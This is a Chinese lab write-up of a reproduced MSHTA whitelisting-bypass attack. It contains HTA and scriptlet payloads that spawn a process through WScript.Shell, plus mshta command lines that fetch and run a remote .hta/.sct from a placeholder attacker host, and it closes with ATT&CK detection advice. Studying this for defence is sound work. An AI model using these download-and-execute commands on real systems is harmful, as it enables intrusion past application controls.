最近复现了一个MSHTA命令执行的攻击,这里做个记录。
所需环境
这里使用了两台互相联通的电脑分别作为攻击机和靶机。
攻击机
- Windows 10
- phpstudy
靶机
- Windows 10
- powershell
背景&技术介绍
假设攻击者已经控制了一台内网主机,但是该主机存在应用白名单限制,因此,尝试通过MSHTA程序绕过限制。
百度百科对MSHTA简介如下:
mshta一般指mshta.exe。mshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。
百度百科对HTA的简介如下:
HTA是HTML Application的缩写(HTML应用程序),是软件开发的新概念,直接将HTML保存成HTA的格式,就是一个独立的应用软件,与VB、C++等程序语言所设计的软件界面没什么差别。
HTA虽然用HTML、JS和CSS编写,却比普通网页权限大得多。它具有桌面程序的所有权限(读写文件、操作注册表等)。HTA本来就是被设计为桌面程序的。
而ATT&CK官网对该技术的原理说明如下:
攻击者可能会通过受信任的 Windows 实用程序滥用 mshta.exe 来代理恶意 .hta 文件和 Javascript 或 VBScript 的执行。
Mshta.exe 是一种执行 Microsoft HTML 应用程序 (HTA) 文件的实用程序。 HTA 是使用与 Internet Explorer 相同的模型和技术执行的独立应用程序,但在浏览器之外。
Mshta.exe 可用于绕过不考虑其潜在用途的应用程序控制解决方案。 由于 mshta.exe 在 Internet Explorer 的安全上下文之外执行,因此它还可绕过浏览器安全设置。
大概总结一下,该技术的原理为:
- MSHTA是Windows内置的一个程序,主要用于执行HTA程序
- MSHTA可以直接执行远端的HTA
- HTA程序可以包括VBScript、JScript等代码,以此执行命令
- 通过MSHTA运行HTA程序执行命令的方式,可以加载本地受限应用,以此绕过应用白名单限制
- MSHTA在浏览器外部运行,因此也可绕过浏览器安全设置
攻击实施
编写恶意HTA程序
首先,编写恶意的HTA程序,保存为m.hta,hta文件内容如下:
<html>
<head>
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
RunProgram()
</script>
</head>
<body>
Nothing to see here..
</body>
</html>
HTA程序本质上是一个类似HTML的程序,但其中可以嵌入VBScript代码。
这里嵌入了一段VBScript代码,定义了一个程序,程序第一行创建一个shell对象,第二行利用该对象运行计算器程序(当然,VBScript能做的不仅仅是这些,这里只是以计算器做一个例子,如果想要实施更加复杂的攻击,将第二行的命令换成想要执行的shell脚本即可)
HTA还可以嵌入JScript脚本,因此,上面的程序也可以写成下面这样,但注意,需要保存为m.sct:
<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>
<public>
<method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
function Exec() {
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
}
]]>
</script>
</scriptlet>
其实现的功能和前一个文件一样,但这里是使用JScript建立一个ActiveX对象,再通过该对象运行命令
上线恶意程序
文件编写完毕之后,需要将其上线以方便后续攻击。
这里直接安装phpstudy,去官网下载傻瓜式安装即可,安装完毕后,会在安装目录下有一个www文件夹,将我们刚刚编写的恶意程序放进去即可。
然后打开phpstudy,启动所有服务,完成程序上线。
在靶机上运行命令
进入到靶机中,打开powershell,运行以下命令(其中的攻击机地址可以是IP或者域名):
mshta.exe http://攻击机地址/m.hta
或者命令:
/cmd /c mshta.exe javascript:a=(GetObject("script:http://攻击机地址/m.sct")).Exec();close();
或者命令:
mshta vbscript:Close(Execute("GetObject(""script:https[:]//攻击机地址/m[.]sct"")"))
攻击完成
攻击效果
可以看到,命令运行后,靶机电脑上的计算器程序就直接启动运行了:
(图后面再补)
如果将恶意的HTA程序中的脚本换成其他命令,则可以实施更加复杂且危险的攻击。
预防措施
在ATT&CK中也给出了一定的预防措施:
- 使用进程监控来监控 mshta.exe 的执行和参数。 在命令行中查找执行原始或混淆脚本的 mshta.exe。 将最近对 mshta.exe 的调用与已知良好参数和已执行的 .hta 文件的先前历史进行比较,以确定异常和潜在的对抗活动。 在 mshta.exe 调用之前和之后使用的命令参数也可能有助于确定正在执行的 .hta 文件的来源和目的。
- 监视 HTA 文件的使用。 如果它们通常不在环境中使用,则它们的执行可能是可疑的
